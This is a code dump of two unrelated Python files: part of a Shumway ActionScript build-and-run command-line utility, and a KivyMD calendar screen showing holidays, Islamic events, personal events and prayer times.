print "Environment variable BUILTINABC is not defined, set it to builtin.abc"
if 'SHELLABC' in os.environ:
self.shell_abc = os.environ['SHELLABC'].strip();
else:
print "Environment variable SHELLABC is not defined, set it to shell.abc"
# The builtin.abc cannot be combined with the playerglobal.abc file that comes with Alchemy, thus we need
# this other global.abc library.
if 'GLOBALABC' in os.environ:
self.global_abc = os.environ['GLOBALABC'].strip();
if 'PLAYERGLOBALABC' in os.environ:
self.player_global_abc = os.environ['PLAYERGLOBALABC'].strip();
if 'AVM' in os.environ:
self.avm = os.environ['AVM']
else:
print "Environment variable AVM is not defined, set it to avmshell"
if not self.asc:
sys.exit();
def runAsc(self, files, createSwf = False, builtin = False, shell = False, _global = False, playerGlobal = False, sc = False):
if sc:
outf = os.path.splitext(files[-1])[0]
args = ["java", "-ea", "-DAS3", "-DAVMPLUS", "-classpath", self.asc,
"macromedia.asc.embedding.ScriptCompiler", "-d", "-md", "-out", outf]
else:
args = ["java", "-ea", "-DAS3", "-DAVMPLUS", "-jar", self.asc, "-d", "-md"]
if createSwf:
args.extend(["-swf", "cls,1,1"])
if builtin:
args.extend(["-import", self.builtin_abc])
if shell:
args.extend(["-import", self.shell_abc])
if _global:
args.extend(["-import", self.global_abc])
if playerGlobal:
playerGlobalAbcs = []
if not os.path.isdir(self.player_global_abc):
playerGlobalAbcs.append(self.player_global_abc)
else:
for root, subFolders, abcFiles in os.walk(self.player_global_abc):
for file in abcFiles:
if file.endswith(".abc"):
playerGlobalAbcs.append(os.path.join(root, file))
for abc in playerGlobalAbcs:
args.extend(["-import", abc])
args.extend(files);
subprocess.call(args)
if sc:
os.remove(outf + ".cpp")
os.remove(outf + ".h")
def runAvm(self, file, execute = True, trace = False, disassemble = False):
args = ["js", "-m", "-n", "avm.js"];
if disassemble:
args.append("-d")
if execute:
args.append("-x")
args.append(file)
subprocess.call(args)
class Command(Base):
name = ""
def __init__(self, name):
Base.__init__(self)
self.name = name
class Asc(Command):
def __init__(self):
Command.__init__(self, "asc")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles an ActionScript source file to .abc or .swf using the asc.jar compiler.')
parser.add_argument('src', nargs='+', help="source .as file")
parser.add_argument('-builtin', action='store_true', help='import builtin.abc')
parser.add_argument('-shell', action='store_true', help='import shell.abc')
parser.add_argument('-globals', action='store_true', help='import global.abc')
parser.add_argument('-playerGlobal', action='store_true', help='import playerGlobal.abc')
parser.add_argument('-sc', action='store_true', help='use embedding.ScriptCompiler (needed to compile multiple scripts into one .abc file)')
parser.add_argument('-swf', action='store_true', help='optionally package compiled file in a .swf file')
args = parser.parse_args(args)
print "Compiling %s" % args.src
self.runAsc(args.src, args.swf, builtin = args.builtin, shell = args.shell, _global = args.globals, playerGlobal = args.playerGlobal, sc = args.sc)
class Reg(Command):
def __init__(self):
Command.__init__(self, "reg")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles all the source files in the test/regress directory using the asc.jar compiler.')
parser.add_argument('src', nargs="?", default="../tests/regress", help="source .as file")
parser.add_argument('-force', action='store_true', help="force recompilation of all regression tests")
args = parser.parse_args(args)
print "Compiling Regression Tests"
tests = [];
if os.path.isdir(args.src):
for root, subFolders, files in os.walk(args.src):
for file in files:
if file.endswith(".as") and file != "harness.as":
asFile = os.path.join(root, file)
abcFile = os.path.splitext(asFile)[0] + ".abc"
compile = args.force
if not os.path.exists(abcFile):
compile = True
elif os.path.getmtime(abcFile) < os.path.getmtime(asFile):
compile = True
if compile:
tests.append(asFile)
else:
tests.append(os.path.abspath(args.src))
for test in tests:
args = ["java", "-jar", self.asc, "-d", "-md", "-import", self.builtin_abc, "-in", "../tests/regress/harness.as", test]
subprocess.call(args)
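# Compiles every .as file under ../tests (except the regress and tamarin directories),
# recompiling only files whose .abc output is missing or older than the source unless -force is given.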
class BuildTests(Command):
def __init__(self):
Command.__init__(self, "build-tests")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles all the source files in the test/ directory using the asc.jar compiler.')
parser.add_argument('-force', action='store_true', help="force recompilation of all tests")
args = parser.parse_args(args)
Reg().execute([])
print "Compiling Tests"
tests = [];
# Skip the regress and tamarin directories
testDirectories = set(os.walk('../tests').next()[1]) - set(["regress", "tamarin"])
for dir in testDirectories:
for root, subFolders, files in os.walk("../tests/" + dir):
for file in files:
if file.endswith(".as"):
asFile = os.path.join(root, file)
abcFile = os.path.splitext(asFile)[0] + ".abc"
compile = args.force
if not os.path.exists(abcFile):
compile = True
elif os.path.getmtime(abcFile) < os.path.getmtime(asFile):
compile = True
if compile:
tests.append(asFile)
for test in tests:
args = ["java", "-jar", self.asc, "-d", "-md", "-import", self.builtin_abc, test]
print "Compiling " + test
subprocess.call(args)
return
class Avm(Command):
def __init__(self):
Command.__init__(self, "avm")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Runs an .abc file using Shumway AVM')
parser.add_argument('src', help="source .abc file")
parser.add_argument('-trace', action='store_true', help="trace bytecode execution")
args = parser.parse_args(args)
print "Running %s" % args.src
self.runAvm(args.src, trace = args.trace)
class Dis(Command):
def __init__(self):
Command.__init__(self, "dis")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Disassembles an .abc file ')
parser.add_argument('src', help="source .abc file")
args = parser.parse_args(args)
print "Disassembling %s" % args.src
self.runAvm(args.src, execute = False, disassemble = True)
# Splits a text file with the following delimiters into multiple files.
# <<< type fileName-0
# ...
# >>>
# <<< type fileName-1
# ...
# >>>
class Split(Command):
def __init__(self):
Command.__init__(self, "split")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Splits a delimited text file into multiple text files.')
parser.add_argument('src', help="source .txt file")
parser.add_argument('dst', help="destination directory")
args = parser.parse_args(args)
if not os.path.isdir(args.dst):
print "Destination \"" + args.dst + "\" is not a directory."
sys.exit();
src = args.src
dst = os.path.abspath(args.dst)
print "Splitting %s into %s" % (src, dst)
file = None
for line in readLines(src):
if line.startswith("<<< "):
tokens = line.split(" ")
type = tokens[1]
name = tokens[2]
print "Open " + dst + "/" + name
pathName = os.path.dirname(dst + "/" + name)
print "Path " + pathName
if not os.path.exists(pathName):
os.makedirs(pathName)
                # BASE64 payloads are written back as raw bytes, so open those files in binary mode.
                mode = "wb" if type == "BASE64" else "w"
                file = open(dst + "/" + name, mode)
elif line == ">>>":
file.close()
file = None
else:
if file:
if type == "BASE64":
file.write(base64.b64decode(line))
else:
file.write(line + "\n")
class Compile(Command):
def __init__(self):
Command.__init__(self, "compile")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles an .abc file to .js ')
parser.add_argument('src', help="source .abc file")
parser.add_argument('-trace', action='store_true', help="trace bytecode execution")
args = parser.parse_args(args)
print "Compiling %s" % args.src
self.runAvm(args.src, trace = args.trace, execute = True)
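# Simple command dispatch: the first positional argument selects a Command instance and
# the remaining arguments are forwarded to its execute() method.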
commands = {}
for command in [Asc(), Avm(), Dis(), Compile(), Reg(), BuildTests(), Split()]:
    commands[str(command)] = command
parser = argparse.ArgumentParser()
parser.add_argument('command', help=",".join(commands.keys()))
args = parser.parse_args(sys.argv[1:2])
if args.command not in commands:
    print("Invalid command: %s" % args.command)
    parser.print_help()
    sys.exit(1)
command = commands[args.command]
command.execute(sys.argv[2:])
|
EventDialog.py
|
from kivy.core.window import Window
from kivy.properties import StringProperty, NumericProperty
from kivy.uix.scrollview import ScrollView
from kivymd.app import MDApp
from kivy.lang import Builder
from kivymd.uix.button import MDFlatButton
from kivymd.uix.screen import MDScreen
from kivymd.uix.list import OneLineListItem, TwoLineListItem, MDList
from kivymd.uix.snackbar import BaseSnackbar
from kivymd.uix.tab import MDTabsBase, MDTabs
from kivymd.uix.floatlayout import MDFloatLayout
from kivymd.uix.dialog import MDDialog
from kivymd.uix.textfield import MDTextField
from kivy.uix.screenmanager import ScreenManager, Screen
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.label import MDLabel
from lib.drivers.holidays import Holidays
from lib.drivers.islamic import driver
from lib.drivers.personal import getPersonal
from lib.drivers.getdatelist import getDict, getstrftime
from hijri_converter import convert
from kivy.metrics import dp
from datetime import datetime
import json
import requests
import threading
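# Calendarific API key (placeholder); the world-holiday lookups below need a real key to work.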
APIKEY = 'Top Secret'
kv = """
<WorldEvents>:
BoxLayout:
orientation: 'vertical'
Widget:
size_hint_y: .02
MDLabel:
text: "World Events:"
padding_x: 15
size_hint_y: .1
pos_hint: {"center_y": .5}
theme_text_color: "Custom"
text_color: app.theme_cls.primary_color
ScrollView:
MDList:
id: wrv
<PersonalEvents>:
BoxLayout:
orientation: 'vertical'
MDLabel:
text: "Personal Events:"
padding_x: 15
size_hint_y: .1
pos_hint: {"center_y": .5}
theme_text_color: "Custom"
text_color: app.theme_cls.primary_color
ScrollView:
MDList:
id: prv
<Tabs>:
background_color: 0, 0, 0, 0
size_hint_y: .25
text_color_normal: app.theme_cls.primary_color
text_color_active: app.theme_cls.primary_color
underline_color: app.theme_cls.primary_color
<Tab>:
text_color_normal: app.theme_cls.primary_color
<ErrorSnackbar>:
MDIconButton:
pos_hint: {'center_y': .5}
icon: root.icon
opposite_colors: True
MDLabel:
id: text_bar
size_hint_y: None
height: self.texture_size[1]
text: root.text
font_size: root.font_size
theme_text_color: 'Custom'
text_color: get_color_from_hex('ffffff')
shorten: True
shorten_from: 'right'
pos_hint: {'center_y': .5}
"""
class ErrorSnackbar(BaseSnackbar):
text = StringProperty(None)
icon = StringProperty(None)
font_size = NumericProperty("15sp")
class Tabs(MDTabs):
pass
class Tab(MDFloatLayout, MDTabsBase):
pass
class WorldEvents(MDScreen):
pass
class PersonalEvents(MDScreen):
pass
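# List row that opens an MDDialog with the event's description when tapped.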
class EventItem(OneLineListItem):
description = StringProperty()
def on_release(self):
dialog = MDDialog(
title=self.text,
text=str(self.description)
)
dialog.open()
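# Screen that shows everything known about a single date: the Islamic date label, an
# "Events" tab (world holidays, Islamic events and personal events) and a "Namaz Times" tab.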
class EventContent(MDScreen):
def build(self):
return Builder.load_string(kv)
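    # Builds the widget tree for the given Gregorian date. Note that the Calendarific
    # request below runs on the calling thread, so create() blocks until it returns.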
def create(self, year, month, day):
self.build()
country = driver().getCity()['countryCode']
iso = datetime(int(year), int(month), int(day))
key = getstrftime('%A, %B {S}, %Y', iso)
islamic_date = getDict()[key].split(',')[1].strip()
hijri = convert.Gregorian(year, month, day).to_hijri().datetuple()
hijri_iso = f"{hijri[2]}-{hijri[1]}"
islamic = []
self.label = MDLabel()
self.label.size_hint_y = .05
self.label.font_size = "35px"
self.label.halign = "center"
self.label.text = islamic_date
tabs = Tabs()
tabs.on_tab_switch = self.on_tab_switch
events = Screen(name='events')
namaz = Screen(name='namaz')
personal_events = getPersonal(str(iso).split()[0])
layout = MDBoxLayout(orientation='vertical')
eventslayout = MDBoxLayout(orientation='vertical')
self.sm = ScreenManager()
events.add_widget(eventslayout)
self.sm.add_widget(events)
self.sm.add_widget(namaz)
tabs.add_widget(Tab(text="Events"))
tabs.add_widget(Tab(text="Namaz Times"))
personalscreen = PersonalEvents()
world = WorldEvents()
scroll = ScrollView()
self.nrv = MDList()
self.wrv = world.ids.wrv
self.prv = personalscreen.ids.prv
self.holidays = json.loads(requests.get(
f'https://calendarific.com/api/v2/holidays?&api_key={APIKEY}&country={country}&year={year}').text)
self.holidays['year'] = year
with open('./lib/data/islamic.json', 'r', encoding="utf-8") as file:
            data = json.load(file)
for key in data.keys():
if key == hijri_iso:
islamic.append(data[key]["event"])
holidays = (Holidays().getHoliday(day, month, year, self.holidays))
self.wrv.add_widget(OneLineListItem(text="No Events"))
self.prv.add_widget(OneLineListItem(text="No Events"))
if holidays or islamic:
self.wrv.clear_widgets()
for i in holidays + islamic:
text = str(i)
                description = ""
                if isinstance(i, dict):
                    text = str(i['name'])
                    description = str(i['description'])
item = EventItem(text=str(text), description=str(description))
self.wrv.add_widget(item)
if personal_events:
self.prv.clear_widgets()
for x in personal_events:
item = OneLineListItem(text=str(x))
self.prv.add_widget(item)
self.namaz_times = driver().getSalaatTimesForDate(iso)
        for name, value in self.namaz_times.items():
            self.nrv.add_widget(
                TwoLineListItem(text=str(name), secondary_text=str(value), height=dp(50)))
scroll.add_widget(self.nrv)
layout.add_widget(self.label)
layout.add_widget(tabs)
layout.add_widget(self.sm)
eventslayout.add_widget(world)
eventslayout.add_widget(personalscreen)
namaz.add_widget(scroll)
self.sm.current = "events"
self.add_widget(layout)
return self
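    # Refreshes the cached holiday data for a new year on a background thread and returns
    # the cached value immediately (it may still be for the previous year until the thread finishes).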
def switch_year(self, year):
thread = threading.Thread(target=self.setHoliday, args=(year,))
thread.start()
return self.holidays
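    # Fetches the holiday list for the given year from Calendarific and replaces the cache.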
def setHoliday(self, year):
country = driver().getCity()['countryCode']
self.holidays = json.loads(requests.get(
f'https://calendarific.com/api/v2/holidays?&api_key={APIKEY}&country={country}&year={year}').text)
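    # Updates the existing widgets in place for a new date instead of rebuilding the whole
    # screen: label text, event lists, and (on a background thread) the namaz times.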
def switch_dates(self, year, month, day):
iso = datetime(int(year), int(month), int(day))
key = getstrftime('%A, %B {S}, %Y', iso)
islamic_date = getDict()[key].split(',')[1].strip()
self.label.text = islamic_date
thread = threading.Thread(target=self.setNamaz, args=(iso,))
thread.start()
hijri = convert.Gregorian(year, month, day).to_hijri().datetuple()
hijri_iso = f"{hijri[2]}-{hijri[1]}"
islamic = []
personal_events = getPersonal(str(iso).split()[0])
with open('./lib/data/islamic.json', 'r', encoding="utf-8") as file:
            data = json.load(file)
for key in data.keys():
if key == hijri_iso:
islamic.append(data[key]["event"])
self.wrv.clear_widgets()
self.prv.clear_widgets()
holidays = (Holidays().getHoliday(day, month, year, self.holidays))
self.wrv.add_widget(OneLineListItem(text="No Events"))
self.prv.add_widget(OneLineListItem(text="No Events"))
if holidays or islamic:
self.wrv.clear_widgets()
for i in holidays + islamic:
text = str(i)
                description = ""
                if isinstance(i, dict):
                    text = str(i['name'])
                    description = str(i['description'])
item = EventItem(text=str(text), description=str(description))
self.wrv.add_widget(item)
if personal_events:
self.prv.clear_widgets()
for x in personal_events:
item = OneLineListItem(text=str(x))
self.prv.add_widget(item)
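    # MDTabs callback: switches the ScreenManager between the "events" and "namaz" screens
    # based on the text of the selected tab.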
def on_tab_switch(self, *args):
if args[2] == "Events":
self.sm.transition.direction = 'right'
self.sm.current = "events"
elif args[2] == "Namaz Times":
self.sm.transition.direction = 'left'
self.sm.current = "namaz"
def setNamaz(self, iso):
self.namaz_times = driver().getSalaatTimesForDate(str(iso).split()[0])
self.nrv.clear_widgets()
        for name, value in self.namaz_times.items():
            self.nrv.add_widget(TwoLineListItem(text=str(name), secondary_text=str(value), height=dp(60)))
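# Minimal manual test harness: type a date as "year|month|day" in the text field and press
# "Change Date" to exercise switch_dates().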
class test(MDApp):
def build(self):
self.content = EventContent(size_hint_y=None, height=400).create(2021, 4, 29)
self.layout = MDBoxLayout(orientation='vertical')
self.textfield = MDTextField(hint_text="Type Here")
self.button = MDFlatButton(text="Change Date", on_release=self.changedate)
self.layout.add_widget(self.textfield)
self.layout.add_widget(self.button)
self.layout.add_widget(self.content)
return self.layout
def changedate(self, instance):
text = self.textfield.text.split('|')
self.content.switch_dates(int(text[0]), int(text[1]), int(text[2]))
if __name__ == '__main__':
test().run()
|